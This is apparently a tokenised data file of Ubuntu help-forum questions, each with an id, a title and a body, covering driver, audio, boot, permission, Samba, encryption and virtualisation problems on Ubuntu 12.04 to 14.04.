xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . name of display : :0.0
501535	no audio from line in	ubuntu 14.04 ; creative sound blaster live ! 24 bit sound card ; dell desktop computer ; amplified speakers . ca n't get any sound from line in . tried gnome alsa and pulseaudio mixers , installed restricted extras , loopback , no luck . streaming audio from the internet works . what can i try next ? thanks .
501538	how to check if fstab file is correct without sudo ?	i updated from saucy to trusy . after that , using sudo segfaulted : fkalter @ london ~ > sudo whoami [ sudo ] password for fkalter : yubikey for `fkalter ' : [ 1 ] 16961 segmentation fault ( core dumped ) sudo whoami so when i tried running strace to get some more info , this showed up in the output : sudo : effective uid is not 0 , is '' ... , 140sudo : effective uid is not 0 , is /usr/bin/sudo on a file system with the 'nosuid ' option set or an nfs file system without root privileges ? my /etc/fstab at this time is this : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 uuid=1afaad96-8aa3-4283-95a4-20510e5b3fbb / ext4 rw , async , exec , nouser , suid , errors=remount-ro 0 1 # uuid=1afaad96-8aa3-4283-95a4-20510e5b3fbb / ext4 defaults 0 1 uuid=46605028-51e4-4676-b621-2d8fbab185d5 /boot ext4 defaults 0 2 uuid=8f6af894-fc4a-4a81-b1f7-20c42ef35fe0 /home ext4 defaults 0 2 to check how my root filesystem was mounted i ran mount without arguments : fkalter @ london ~ > mount /dev/sda6 on / type ext4 ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) cgroup on /sys/fs/cgroup/cpuset type cgroup ( rw , relatime , cpuset ) cgroup on /sys/fs/cgroup/cpu type cgroup ( rw , relatime , cpu , release_agent=/run/cgmanager/agents/cgm-release-agent.cpu ) cgroup on /sys/fs/cgroup/cpuacct type cgroup ( rw , relatime , cpuacct , release_agent=/run/cgmanager/agents/cgm-release-agent.cpuacct ) cgroup on /sys/fs/cgroup/memory type cgroup ( rw , relatime , memory , release_agent=/run/cgmanager/agents/cgm-release-agent.memory ) cgroup on /sys/fs/cgroup/devices type cgroup ( rw , relatime , devices , release_agent=/run/cgmanager/agents/cgm-release-agent.devices ) cgroup on /sys/fs/cgroup/freezer type cgroup ( rw , relatime , freezer , release_agent=/run/cgmanager/agents/cgm-release-agent.freezer ) cgroup on /sys/fs/cgroup/blkio type cgroup ( rw , relatime , blkio , release_agent=/run/cgmanager/agents/cgm-release-agent.blkio ) cgroup on /sys/fs/cgroup/perf_event type cgroup ( rw , relatime , perf_event , release_agent=/run/cgmanager/agents/cgm-release-agent.perf_event ) cgroup on /sys/fs/cgroup/hugetlb type cgroup ( rw , relatime , hugetlb , release_agent=/run/cgmanager/agents/cgm-release-agent.hugetlb ) /dev/sdf1 on /mnt/secret type ext4 ( rw ) /dev/sda1 on /boot type ext4 ( rw ) /dev/sda5 on /home type ext4 ( rw ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) /home/fkalter/.private on /home/fkalter type ecryptfs ( ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=153b19c1d2ccc61f , ecryptfs_fnek_sig=03fd342dfcc3e207 ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=fkalter ) the first row shows that the only options are rw ( read/write ) . no suid , or any other options i specified in fstab . to see what happens during the boot process here is the output of dmesg . fkalter @ london ~ > dmesg | grep mount [ 4.445090 ] ext4-fs ( sda6 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 7.767086 ] ext4-fs ( sda6 ) : re-mounted . opts : ( null ) [ 7.833123 ] ext4-fs ( sdf1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 7.842508 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 7.855840 ] ext4-fs ( sda5 ) : mounted filesystem with ordered data mode . opts : ( null ) which also shows no mount options if i intrepid this correctly . i suspect there is something wrong with my fstab file ( permissions , typo , etc ) . when googling , the only answer seems to be sudo mount -a . finally my question is this . how can i check this without sudo ?
501539	graphics problem ( dualhead msi nvidia geforce 660 )	the computer boots up fine , however after only a minute or so of running , the applications and icons begin glitching ( large verticle bars of solid color or missing text , similar to what i 'd call `` missingno '' ) . the gui itself is not effected . initially i did not have this problem and it only resulted in occasional freezing . i was even able to play some games for a short period of time , but now i can not have the computer on for more than 2 minutes without this happening.the graphics card is mounted properly and receiving adequate ventilation so i do n't think its an overheating issue . i do n't even have enough time to go to the nvidia site and update the drivers .
501540	microphone not working	microphone stopped working . sound configuration input volume is set to 100 % and input level bars graph reach about 50 % even with no microphone device connected on the jack . the same happens with both front and rear microphone . when i connect the microphone and try to record , all i can hear is noise . what could i do to solve the problem ?
501545	finding out what amd radeon chip and installing drivers	i have a lenovo g500 laptop which has a label showing `` amd radeon graphics '' . i want to find out what chip set it is and install drivers as i am unable to use graphics and am forced to use tty mode . i have ubuntu 14.04 on it .
501546	copying files getting hanged in between	i am using the default file manager . it does n't perform transfer operations efficiently . is there any way i can make the file manager as efficient as the windows one ? or is there any other file manager which is much more efficient ?
501549	ubuntu , netflix , vpn	unsurprisingly netflix is running at a crawl in my home ( where i run ubuntu 14.04 ) . i 'm not sure if the problem is the emulation or my isp ( other things run pretty fast ) . so , i 'm about to test that theory . most people doing these `` prove netflix is being throttled '' tests online use a vpn of some sort to mask the connection to netflix . is there an easy way to do this using ubuntu so i can determine if my isp is ripping me off or if the emulation is just bad and i need to look for another solution ? netflix is running using the pipelight plugin for linux on chrome , which uses user agent switcher to make netflix think i 'm running firefox on windows . it 's a pretty standard way of doing this , but i really would like for there to be an easier way .
501550	driver r8169 of realtek	somebody knows what happened with driver r8169 of realtek ? internet connection works well in windows vista ultimate . however on ubuntu 14.04 , it did not work . it does not recognize wired connection . please help .
501551	permissions to move files and folders	good day peeps , i have two user accounts to my samba server - dpuser & dpuser1 . dpuser1 should have the highest level of access in this case , and dpuser should have limited directory access . the problem is , dpuser creates a folder with files in it , the dpuser1 ca n't move delete or edit any of those files , but they can view it . i ca n't run sudo chmod 777 /home/srv -r every time someone creates a folder and/or files from the dpuser account . any ideas ? if dpuser creates a file/folder that both accounts have permission to , to chop and change the files/folders ? my smb.conf file : [ master drive ] comment = mater drive files path = /home/srv/master browseable = yes read only = no # guest ok = yes valid users = dpuser dpuser1 writeable = yes directory mask = 0777 create mask = 0777 write list = dpuser dpuser1 [ accounts ] comment = accounts files path = /home/srv/accounts browseable = yes read only = no # guest ok = yes valid users = dpuser1 create mask = 0777
501553	ca n't upgrade ubuntu 13.04 because of broken python	because of broken python i ca n't do anything . apt-get got broken . when i run `` do-release-upgrade '' i get : root @ virtman : /home # sudo do-release-upgrade could not find platform independent libraries < prefix > could not find platform dependent libraries < exec_prefix > consider setting $ pythonhome to < prefix > [ : < exec_prefix > ] fatal python error : py_initialize : unable to get the locale encoding importerror : no module named 'encodings' have been googling for hours but nothing . hope you can help me . ps additional info in my other topic : broken python and apt-get on ubuntu 13.04
501556	last -t [ date ] not filtering results by date	if i run : last -t 20150101010101 i still get logins displayed ( even though the date is in the future ) if i run last -t 20140723123000 i still get logins displayed from months back . i would expect to only see logins from earlier on today . is this correct ?
501558	how do i remove microsoft windows on an asus desktop	i installed ubuntu but windows is still there . my old ubuntu cd wo n't work on the asus desktop as there 's no cd drive . how do i completely remove windows ?
501559	how to reset errornous font in promt and output of gnome-terminal	i 'm experiencing replacement of all occurances of certain characters in the prompt and output of gnome-terminal ( 3.6.2 in ubuntu 14.04 ) , e.g . ( latin d is replaced with some kind of uppercase d in exponent and some other pixels below ) . reset and clear do n't help . copying the output/prompt returns the character sequence without replacements .
501560	how to update opengl driver on ubuntu 14.04 lts	i recently upgraded to 14.04 , then i installed steam , and tf2 . i get this error message , anyway , i know i need to update my opengl driver , my question is how do i do it ? edit : i installed mesa and entered glxinfo | grep version into terminal and got this , new edit : after looking into the first answer , i did all of the steps , and restarted my computer , when i launched steam on startup , i got the following error ,
501563	root must be setuid root	i accidentally ran this command chmod -r 755 /usr/bin on my remote server [ ubuntu 12.04.3 lts ] , and i do n't have the root password . when i run sudo it gives me sudo : must be setuid root , this is the /bin folder permissions drwsr-xr-x 2 deployer root 40960 juil . 23 11:54 bin ssh connexion is the only access i have to my remote server .
501572	how to install a mantis dvb-s card ?	i am a newbie to ubuntu and i am trying to fix this along time ago now . i am running 14.4 lts distro . i tried to install all kinds of software that plays dvb card azure wave mantis but it keep saying i do n't have one . after executing the command sudo lshw i got this output : ... *-pci:2 description : pci bridge product : 82801 pci bridge vendor : intel corporation physical id : 1e bus info : pci @ 0000:00:1e.0 version : e1 width : 32 bits clock : 33mhz capabilities : pci subtractive_decode bus_master cap_list resources : ioport : fdd00000 ( size=1048576 ) *-multimedia unclaimed description : multimedia controller product : mantis dtv pci bridge controller [ ver 1.0 ] vendor : twinhan technology co. ltd physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : bus_master configuration : latency=32 maxlatency=255 mingnt=8 resources : memory : fddff000-fddfffff so please anyone tell me what to do to install the dvb-s card and use it ?
501575	application ( or code ) to download from the gallery with thumbnails	for example : - http : //www.raagalahari.com/movies/6970/haider-hd-movie-stills.aspx the above link leads to a site with thumbnails , clicking which loads the full sized image . now , the full size images are also embedded in a site that ends with '.aspx . ' so i need the app or code to first scan the thumbnails , then go to the site which has the embedded full sized image and then download it . i hope someone could help . ps : i just moved from windows , so i do n't have any apps or software that did n't come along with ubuntu 14.04 . i think from the terminal i have downloaded wget ( or else it came along with the os . ) anyway , i had used it once ( tried to ) for the same task in the question but i do n't know what commands to use .
501578	turbo core not working	i got ubuntu 14.04 on hp pavalion g6 with an amd apu a6 llano which has a stock frequency of 1500mhz and is capable of boosting to 2400mhz . but on my system it 's turbo boost feature is not working .
501582	install ubuntu but still boot into windows 7 ( no grub screen )	edit : nothing was required my end , i have picked the best answer ( which i was going to do anyway ) thanks for the suggestions first of all i want to boot windows only , i 'm not having a duel-boot problem i want to install ubuntu on my laptop after windows has really become slow and even the live cd boots faster , the main problem is that my parents use my laptop and they would n't know what to do at the grub screen . i know how to set up grub on my flash drive but i still have the problem that ubuntu is likely to boot instead of windows , any help ? if it helps , i am running windows 7 32-bit and i want to install ubuntu 12.04 as it seems that 14.04 live cd does n't boot on my laptop , i only have one hard drive installed with 2 partitions ( 3 when i 've installed ubuntu ) thank you for your help
501588	what is wrong with ubuntu 14.04 ? font rendering bugs	my ubuntu is being very very irritating after upgrading to 14.04 . every once in a blue moon , certain glyphs just disappear from the screen . every once in a while , ( even as i 'm writing this question ) , all my i 's are disappearing , with nothing being shown instead . actually , check this out : before typing more : after typing m**o**re : this is a system-wide problem , some screenshots from firefox , nautilus , etc : how do i fix these errors ? i have the nvidia graphics driver installed right now , but even with a pristine install ( with the nouveau driver , this problem was there )
501591	open terminal in current directory with tmux	i have a simple .bashrc file at the moment that allows me to always open the same terminal ( reopen , actually ) running tmux . the important part is shown below . the essence of this is that when you execute tmux attach -d you disconnect any tmux session that is running , effectively closing the terminal window that is open ( since i opened it with the tmuxcommand ) . tmux is still running however , so calling a terminal with tmux attach -d reopens that session thanks to a little line in the tmux config file . this works great but now i 'd like to have the functionality back that opens a terminal window in the directory where i click `` open terminal here '' . i understand i would have to to the following : tell tmux to `` c-m c '' ( create new panel ) cd to the current directory is this possible ? i have a very limited knowledge of this sort of things , hence i 'm asking . i have been looking around and found this gist ( also shown below ) . it makes sense but i do n't know how to get the $ { target } variable inside the .bashrc file . .bashrc 116 # start tmux every time we call up a terminal 117 [ [ $ term ! = `` screen '' ] ] & & exec tmux attach -d tmux.conf 1 # if run as `` tmux attach '' , create a session if one does not already exist 2 new-session -n $ host the gist file tmux_pwd ( ) { [ -z `` $ { tmux } '' ] & & return target=\-t $ ( tmux display-message -p `` # s '' ) tmux set-window-option $ { target } default-path $ pwd > /dev/null ( ( sleep 300 ; tmux set-window-option $ { target } default-path ~/development > /dev/null ; ) & ) > /dev/null 2 > & 1 } alias pwd= '' \pwd ; tmux_pwd ''
501594	gnome3 : how to set to play sound when battery power is low ?	there is some setting for this function before gnome3 : an audio file can be set to be played when battery power is too low . i did not find the setting in gnome3 . is that possible for gnome3 ? and how ?
501595	hdmi not recognized	i 'm running trusty on my g500 lenovo laptop , with inter graphics . i just bought a dell p2214h screen , but my computer recognizes only the vga , trying to use the hdmi port ( with a hdmi 2 display port cable ) doesnt work . i 'm relative newbie , and i 've seen a lot of stuff about it but could n't understand what to do with it . i can only say that in xrandr it says hdmi1 not connected . please help !
501598	xubuntu 14.04 : unable to click and drag with clickpad	right now , my clickpad is unusable since i can not click and drag items reliably . when i click down with my pointer finger , i expect to use my middle finger for dragging . however , my index finger is still being used for input , and throws my dragging off horribly with any minor movement . i would appreciate any assistance .
501606	ca n't use network printer via samba , how to debug the problem ?	i 've got a network printer available through samba and i 'd like to use it from my ubuntu 14.04 . unfortunately simply adding it through printers is not enough . if i try to use it it says : connection failed : nt_status_unsuccessful and then unable to connect to cifs host , will retry in 60 seconds ... how can i debug these things and learn the reason it does n't work ? /var/log/cups/error_log e [ 23/jul/2014:13:58:41 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:13:58:42 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:13:58:43 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:13:58:43 +0200 ] [ job 5 ] unable to connect to cifs host , will retry in 60 seconds ... e [ 23/jul/2014:13:59:44 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:13:59:45 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:13:59:46 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:13:59:46 +0200 ] [ job 5 ] unable to connect to cifs host , will retry in 60 seconds ... e [ 23/jul/2014:14:00:47 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:14:00:48 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:14:00:49 +0200 ] [ job 5 ] connection failed : nt_status_unsuccessful e [ 23/jul/2014:14:00:49 +0200 ] [ job 5 ] unable to connect to cifs host , will retry in 60 seconds ...
501607	get a rid of the header section in a qml app on ubuntu sdk	it is possible to remove the header section in the mainview of an new qml app ? code : import qtquick 2.0 import ubuntu.components 0.1 import `` components '' /* ! \brief mainview with a label and button elements . */ mainview { width : 400 height : 400 transformorigin : item.center clip : false opacity : 1 // objectname for functional testing purposes ( autopilot-qt5 ) objectname : `` mainview '' // note ! applicationname needs to match the `` name '' field of the click manifest applicationname : `` com.ubuntu.developer.username.hello1 '' page { id : page1 clip : false title : `` hello world '' column { id : column1 anchors.bottommargin : 45 spacing : units.gu ( 1 ) anchors { margins : units.gu ( 2 ) fill : parent } hellocomponent { id : label height : 50 objectname : `` label '' text : i18n.tr ( `` hello.. '' ) anchors.left : parent.left anchors.leftmargin : 0 anchors.right : parent.right anchors.rightmargin : 0 } button { objectname : `` button '' width : parent.width text : i18n.tr ( `` tap me ! '' ) onclicked : { label.text = i18n.tr ( `` ..world ! '' ) } } } } } if i remove the title : `` hello world '' of the page element the header seems to be gone but then the normal window title has this title : how can i change only this title and hide the header section ?
501610	webdriver not finding firefox 21.0 installation on ubuntu 1404 lts	been scratching my head for hours over this . installed firefox 21 from a tar.gz file . extracted and placed in /opt/firefox sysmlink i used : sudo ln -s /opt/firefox/fiefox / usr/bin/firefox whereis firefox shows as : /usr/bin/firefox /etc/firefox /usr/bin/x11/firefox in terminal if i type in firefox and hit enter it loads up . however in the search function ( not sure what its called ) through the launcher if i type in firefox it does not find firefox . the issue this is causing me is with selenium webdriver when calling getdriver ( ) it is returning null like it ca n't find the installed firefox the get driver command works fine on my colleagues machine so it isnt a code issue it is something specifically wrong with my linux set up but i have gone through everything i can think of . any suggestions ?
501612	error while kvm installtion in unbuntu 14.04	i am receiving an error message when trying to install a kvm virtual machine.i have provide you the complete log message below . i managed to install kvm file successfully in ubuntu 12.04 version . details : host os : ubuntu 14.04 gust os ( vm ) : centos log message is below : unable to complete install : 'internal error : process exited while connecting to monitor : qemu : at most 2047 mb ram can be simulated ' traceback ( most recent call last ) : file `` /usr/share/virt-manager/virtmanager/asyncjob.py '' , line 96 , in cb_wrapper callback ( asyncjob , *args , **kwargs ) file `` /usr/share/virt-manager/virtmanager/create.py '' , line 1983 , in do_install guest.start_install ( false , meter=meter ) file `` /usr/lib/python2.7/dist-packages/virtinst/guest.py '' , line 1246 , in start_install noboot ) file `` /usr/lib/python2.7/dist-packages/virtinst/guest.py '' , line 1314 , in _create_guest dom = self.conn.createlinux ( start_xml or final_xml , 0 ) file `` /usr/lib/python2.7/dist-packages/libvirt.py '' , line 3199 , in createlinux if ret is none : raise libvirterror ( 'virdomaincreatelinux ( ) failed ' , conn=self ) libvirterror : internal error : process exited while connecting to monitor : qemu : at most 2047 mb ram can be simulated
501614	grub2 /etc/grub.d/ 40_custom multi-boot	i am adding gobolinux to windows vista and ubuntu 12.04 with grub2 on the mbr but i am not clear on the script or how to devise a script to replace 40_custom . loading the gobo grub to it 's own root seems the only practical place so i need a script menuentry `` gobolinux '' { set root= ( hd0,4 ) linux /vmlinuz root=/dev/sda7 ro quiet splash initrd /initrd.img } seems to be used for linux or menuentry `` windows 7 '' { insmod ntfs set root= ' ( hd0,4 ) ' search -- no-floppy -- fs-uuid -- set 1cfc7a8dfc7a60c6 chainloader +1 } but i have seen variations on these but i have been unable to understand exacly how they are used and if grubcustomiser is used instead of editing the file directly how do you decide on which type of boot is selected . what i have read so far does not quite make it clear in either case . explanations or further reading would be handy .
501617	swappiness change results in problems	a couple days ago i changed the swappiness of the kernel from 60 to 30 . i am having problems . on boot , i am seeing errors ( in windows only ; unity and x.org still work fine as far as i know ) that say that programs have crashed and to report it , and that a `` system problem detected '' or something similar , or `` ubuntu 14.04 has experienced an internal error '' . how do i fix this without having to bring my swappiness up to 60 , or can i not solve it in another way ? are these problems bugs or is this what happens when you change swappiness ?
501618	how to change read-only permission under 501 user ?	i have a hard disk that install on it mac osx 10.4.11 , so i plugged that to my ubuntu system and now i can see all of the files , but it 's just read only under the 501 user permission i 'm root in ubuntu and i tried to copy files on it via chown , but i ca n't , this hdd has 3 partitions and all of them are read-only under 501 permission . i wrote this under root in shell chown -r foldername chown -r filename thank you
501621	live cd installation	i downloaded ubuntu-12.04.4-dvd-i386.iso from ubuntu website , and i burn an image on a dvd . now when i insert the dvd and restart my computer and booted it from the dvd i got a massage said : bootmngr missing press ctrl+alt+del to restart . pleas any help .
501623	change gcc output directory	how can the output of gcc be directed from default directory to an output directory ? i created a source directory containing the source programs and an output directory to store the compiled programs . i am unable to set the environment variables for gcc .
501625	custom repository for `` click '' packages	for standard deb packages we can use reprepro . is there any custom repository related solution for `` click '' packages ?
501626	media player breaking audio	i am a new user my problem is when i play the video in any browser it is good but when i play it in any video player the audio is distorted what should i do ? \ i am using 14.04 lts
501627	hardware acceleration in video playback	i have ubuntu system with amd apu a6 llano . when i play hd videos on ubuntu using vlc or some other media player it takes so much cpu usage but when i play same video on windows 7 it takes just 5 % cpu usage . i installed latest amd fglrx drivers but why it does n't make use of gpu decoding playing video like windows 7 .
501629	removing bluez and friends packages completely in ubuntu 14.04	am using a dell inspiron n4110 laptop . it is running ubuntu 14.04 amd64 and windows 7 ultimate x64 ( both fresh installations ) in dual-boot configuration . the laptop has atheros wlan + bluetooth 4.0 . i have never used nor intend to use bluetooth in my laptop . when i tried to completely remove bluez & friends packages ( using synaptic package manager ) , it also marks ubuntu-control-center and other ubuntu-* packages for complete removal . so , can someone please clarify whether it is possible to uninstall bluez packages completely without harming my ubuntu installation ? also , please recommend the proper way to completely uninstall the bluetooth software stack from ubuntu .
501630	is it possible to join ubuntu 14.04 to windows server 2012 r2 domain ?	if it is possible to add could some of you experts tell me how please ? thank you
501631	any way to find keybindings currently in use ? ( ubuntu , compiz or otherwise )	is there a good way to list or find out the keybindings that are currently in use on your computer ? i 'm changing some keybindings in compiz ( particularly because i do n't have a keypad ) and i did n't want to take away from other plugins that are already using a particular keybinding . i know it is n't particularly a big issue as i could always assign a new binding as i need a command , but it can be difficult to keep track of . i found this question : how to list compiz keybindings in use ? which gives two different codes in two different answers to supposedly list the bindings just for compiz , but it 's severely outdated and both return a : no value set for `/apps/compiz-1/general/screen0/options/active_plugins' also i did n't want to mix compiz bindings with ubuntu bindings or other bindings , so i was wondering if there was a way to list all bindings together . i thought it might be more efficient if there was a way or piece of simple software that could be run in the terminal and then output the command of any bindings . that way you could enter a key combination and it would give you the command of whatever it is bound to , or output nothing if that key combination is free . does anyone know of anything ? on a slightly unrelated note ( but surely not worth its own topic/question ) , does anyone know what the begin key is ? i came across some bindings with kpbegin , kpend , etc . and i know that end is obviously the end key . but begin is not the home key , that gives its own name , and i tried to look online but could n't really find anything except some things suggesting it was the enter key , but this is return . thanks for reading .
501632	error on installing downloaded chrome .deb	i have downloaded chrome on 14.04 as .deb package . whenever i try to install it , it gives error `` dependency is not satisfiable '' .
501634	finding full path of a symlink'ed file ( more quickly ) ?	under properties dialog window : link target : the path of the original file is always shortened , due to a programed restriction of characters space , even after resizing the window , and therefore of not much use . when the link target path is copied and pasted to a terminal window , it looks like this : ../../lib/firefox/icons/mozicon128.png which is a small improvement , since now the original file name is fully know and locate mozicon128.png will provide the correct path , which is : /usr/lib/firefox/icons/mozicon128.png q1 : what other options are there to find the path more quickly , without using the suggested two steps ( maybe a right-click menu integration that copies the path to clipboard would be great ) ? ! q2 : ../../ refers to / ( see screenshot below ) , but why , instead of being more accurate ? is there any build in option , to copy the full path from properties dialog window ( ubuntu 11.10 ) ? path of the symlinked firefox image in this example is : /usr/share/pixmaps/firefox.png
501635	how to open sitx files ?	i want to open a sitx file . i tried to open it using unar and 7zip , but i did not succeed . what is the right application to open sitx files ?
501637	can i `` cryptsetup ... luksformat '' a partition formatted with ext4 , or must it be unformatted ?	i would like to setup full disk encryption ( fde ) for an external harddrive . my question is about the sequence of formatting . will the following sequence work fine or do i need to run luksformat on an unformatted partition ? blockquote step1- use gparted to create an msdos partition-table step2- use gparted to create and format a partition with ext4 ( let 's say partition name is `` sdb1 '' ) step3- unmount partition /dev/sdb1 step4- open terminal and run command sudo cryptsetup luksformat /dev/sdb1 blockquote do i now have an fde external harddrive ? i 've read in a few places that the luksformat command is run on an unformatted partition . is this a requirement ? have i done anything wrong by formatting with ext4 and then running luksformat ? any guidance on how to properly achieve fde for external harddrive would be great . thanks . performing this task on ubuntu 14.04 .
501641	ca n't understand the readme file of an extracted tar.gz file	the readme file of a file says : running : 1 . extract the contents of this .tar.bz2 file . 2 . change to the 'azureus ' directory where the files were extracted . 3 . start azureus by running the script named 'azureus ' ; ex . `` ./azureus '' note : if you have the java jre installed somewhere unusual ( or not in your path ) , use the java_program_dir option in the script . but just running ./azureus does nothing .
501642	accessing a remote file via ssh on ubuntu 12.04	i have a text file on one of my computers that is running 12.04 . i was planning to use ssh to allow for another computer to read this text file . the issue is that the system that i am working with is basically logging some information on this text file at real time . i need for the computer that is going to read this text file , to read the text file at real time as well . i am not savvy at all with ssh , but i am familiar with ubuntu . if anyone can provide some insight as to how to do this , or if it is even possible to read this text file at real time while another system is logging info it would be greatly appreciated . thank you .
501647	system regularly hangs when opening or closing windows	after a day or two of usage this problem starts happening where whenever i open a new window ( or even a dialog in an app that has them ) it will fade in about 50 % and then freeze for about 10 seconds . nothing is responsive during this time . i can move my mouse , but anything i click on will not respond . once this start happening it continues to happen until i reboot . what 's causing this ? how can i fix it ? i 'm running 14.04 with 3 monitors . this happens to all my co-workers too who have a similar set up .
501649	possibility that ubuntu machine infected by ftp malware	i know that this question might be duplicated but here is what happened . our web server got attack by injecting the spam links into server script file ( web server running coldfusion9/.cfm/window/iis ) . we blocked ftp access to only our office ip address after the first attack and also change ftp password . however , the attack is still going on after next few days . the hacker may came through other channel but i would like to make sure we have done best practice for ubuntu security as we run ubuntu on developer machine . ( connect to ftp via eclipse remote file system and filezilla - no wine installed ) would it be possible that hacker hacked to ubuntu machine while the computer is running and connect to ftp to modify the file ? ( they ca n't steal password and connect to ftp from their end because we block all external access to web server except our single office ip , so hacking need to be happened in real-time if it come through ftp ) are there anything we can do to prevent/check this if it 's the case ? waking up at 2am at my timezone to fix the inflected scripts which i do n't know when it going to happen again , this driving me nut . : ( your help would be really appreciated . thank you in advance guys .
501653	upgrading from 10.04 server to 14.04	i have an ubuntu dedicated server hosted at godaddy . i wish to make an upgrade from 10.04 to 14.04 , however each time i login over ssh , i get the notice to be careful if i upgrade because i have raid . so , i wish to know where i need to be careful . i presume that is on installation of grub or kernel , but i do n't know what i need to do for raid hard disks . can someone please tell me more about this specification ? thanks ( i have n't tried anything )
501657	how can a share storage between linux , windows , and mac	how can i share an internal hard drive across a network with both windows and mac with guest read and write permissions ?
501659	how to swap command and control keys with xkb step by step ?	i want to use my apple long aluminium keyboard with swapped command cmd and control ctrl keys . how is this done step by step on trusty tahr ( 14.04 ) using xkb ?
501661	after boot from live cd , no usable desktop	i have an old imac g4 which i am trying to get ubuntu installed on . i have a live cd and can boot from that . everything loads and is running but there is some sort of graphical error and there is just a big white screen with a red bar on the left . i 'm pretty sure this is different from the other white screen of death i keep hearing about because i can still do some things . i can get to ctrl + alt + f1 and f2 , the mouse works , there are options on the left in that red bar that i can click but not much happens when i do . i can click home dash and it brings up some icons in red color . i can not bring up the terminal . i can click install ubuntu but i 'm afraid that i will just install this problem permanently ( right now i can still get to a working osx 10.2 ) i 'm very new to linux but have tried a ton of different things online like reseting unity , trying to install drivers for nvidia , trying to bypass that welcome screen that i hear about but have not seen so far . the computer runs from the cd , goes black for a long time , then the mouse appears for a long time , and then it goes to that white screen with the red bar . i never get any option to choose any thing or hit shift or esc like i have read . i have pictures but it wont let me post them any advice ? memory : 1024 mb processor : 1.25 ghz powerpc g4 nvidia geforce2 mx
501663	unity3d & unity webplayer ca n't get these working	i 'm trying to get unity3d work on ubuntu 14.04 and also unity webplayer . as a young game developer , its very important i have unity ( game engine ) so i can continue to make games . i tried installing .exe using wine , which worked but when i open unity afterwards it basically say error unable to open . unity web player i use this all the time can someone help me to get this on chromiun . i tried using pipelight , but nothing : http : //fenglee.com/game/aog/ anyone can get this game to run ?
501664	using the scrollwheel in gnu screen -- trusty specific difference	i 'd like to setup gnu screen to allow the mouse 's scrollwheel to scroll around in the scrollback buffer , same question as here : http : //stackoverflow.com/questions/359109/using-the-scrollwheel-in-gnu-screen the solution from that question -- making an entry in .screenrc -- which also appears many other times this question is asked , works fine for me on precise , but applying the same fix in trusty and then using the scroll wheel just results in scrolling the command history . i also tried the suggestion from the comments of the linked question of disabling the option `` use keystrokes to scroll on alternate screen '' but that did n't help either .
501667	ca n't use lxle except through live cd	i 'm really new to linux so i apologize in advance for my generalized ignorance on the subject . ( i apologize for my english as well ) recently , after microsoft stopped to provide support to windows xp , i decided to install lxle 12.04 32-bit on an old pc i own . the installation went well and i can use lxle through the live cd without any issues ( actually at this very moment i 'm writing this post from there ) . the problem arises when i take out the cd and try to boot from the hard drive - then the screen turns black and i get the following message - `` attention - out of range - h : 92.6 khz - v : 58.3 hz '' i looked for solutions online and it seems it 's a screen resolution problem , but i ca n't really see what to do to fix it . i tried reinstalling but that does n't help either . on the back of my monitor there are some indications which i think are related to the issue and that i 'm copying here : `` power rating : 100-240v - 50/60 hz 1.5 a '' if more information about the computer is needed in order to help me , please tell me so and i 'll add it to the post . thanks in advance ! !
501668	which niceness to give to prevent freezing ?	if i wanted to give my main system , desktop cinnamon , the highest priority , which pid should i set this for ? the reason is because i have a program that runs for days and would hog up all the resources to a point where i ca n't even move my mouse . it calls several programs on demand so its difficult to set which program to lower priority . when it runs i ca n't do anything else . thus i 'm wonder if i can just give my window the highest priority instead ? thanks ! ahdee
